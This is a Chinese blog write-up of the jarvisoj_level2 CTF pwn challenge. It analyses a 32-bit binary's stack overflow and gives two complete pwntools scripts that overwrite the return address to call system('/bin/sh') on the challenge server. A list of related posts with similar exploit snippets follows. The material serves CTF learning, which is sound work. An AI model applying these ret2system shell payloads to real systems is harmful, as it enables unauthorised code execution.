jarvisoj_level2

最新推荐文章于 2022-08-26 20:58:28 发布
最新推荐文章于 2022-08-26 20:58:28 发布
阅读量566 收藏
点赞数 1
分类专栏: 菜狗子pwn 文章标签: pwn ctf python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56301399/article/details/125940926
版权

文章目录

一、查看文件

在这里插入图片描述在这里插入图片描述

我们可以看到是32位,几乎没有开保护。

二、IDA反编译

我们拖到IDA中看看代码:
main函数中提到了一个 vulnerable_function();
在这里插入图片描述我们看看这个函数 vulnerable_function():
在这里插入图片描述显然是有栈溢出漏洞的。

既然有调用system函数,肯定是可以直接call一波的,只是还缺一个参数,我们看到了read函数心里不禁笑嘻嘻…

然而稍安勿躁,心存侥幸的看一波string:
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

妈耶~善良的出题人

代码

这里有两种方法

(1)

from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",26046)
syad=0x08048320 #system函数的位置
shad=0x0804a024 #/bin/sh的位置
p=b"a"*(0x88+0x04)+p32(syad)+p32(0)+p32(shad)#其中p32(0) 是执行system函数后的存储地址,可以找个合适的值替换。
r.recvuntil(b"Input:\n")
r.sendline(p)
r.interactive()

(2)

from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",26046)
#syad=0x08048320
shad=0x0804a024 #/bin/sh 的位置
#0x0804849e 是call system函数的位置  只需后面加上/bin/sh 位置即可直接执行 不用再加一个地址作为存储
p=b"a"*(0x88+0x04)+p32(0x0804849e)+p32(shad)
r.recvuntil(b"Input:\n")
r.sendline(p)
r.interactive()

在这里插入图片描述

在这里插入图片描述

总结

要先看函数结构,在去看栈结构,system和/bin/sh的位置很重要。

长街395
关注
专栏目录
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1442
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 300
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
[buuctf]jarvisoj_level2
逆向萌新的博客
06-19 495
[buuctf]jarvisoj_level2
jarvisoj_level2【BUUCTF
qq_41696518的博客
08-26 723
jarvisoj_level2【BUUCTF
日行一PWN jarvisoj_level0
m0_57221101的博客
05-14 199
还是来自于BUUCTF的机器,今天的很简单,就是单纯的考察了read函数的漏洞,以及对64位寄存器的理解 开始 首先还是经典查壳和内存保护,发现啥也没有,是很简单的机器。然后IDA反编译一下,由于是64位的软件所以需要IDA64 main函数 首先可以看到主函数中知识调用了write函数,并输出了Hello, Worldn这么几个字到终端。 之后调用了vulnerable_function函数 因为反汇编并不会给出类似于write这种函数的定义, 所以需要熟悉汇编的同学自行根据效果来
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 284
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 530
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
[CTF]jarvisoj_level2
凉水的博客
01-12 511
解题思路 反编译后的源码: undefined4 main(void) { vulnerable_function(); system("echo \'Hello World!\'"); return 0; } void vulnerable_function(void) { undefined local_8c [136]; system("echo Input:"); read(0,local_8c,0x100); return; } 看完上面的反编译,直觉system函数
[BUUCTF]PWN------jarvisoj_level2
BangSen1的博客
01-20 319
jarvisoj_level2 例行检查,32bit,开启NX保护。 nc 一下 ,Hello world,没什么信息 用32位IDA打开,看到了/bin/sh,跟进一下。 想查看调用函数的,但是看不了,所幸地址已经给出,所以shell_addr=0x804A024 system_addr=0x8048320 直接利用这些构造 system(/bin/sh)去执行 找到输入点 buf的大小是0x88,读入的数据大小是0x100,多余空间足以构造rop exp flag ...
【BUUCTF - PWNjarvisoj_level2
古月浪子的博客
04-05 664
checksec一下,栈溢出 IDA打开看看,很容易找到溢出点,/bin/sh字符串程序里也有现成的 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) ru=lamb...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值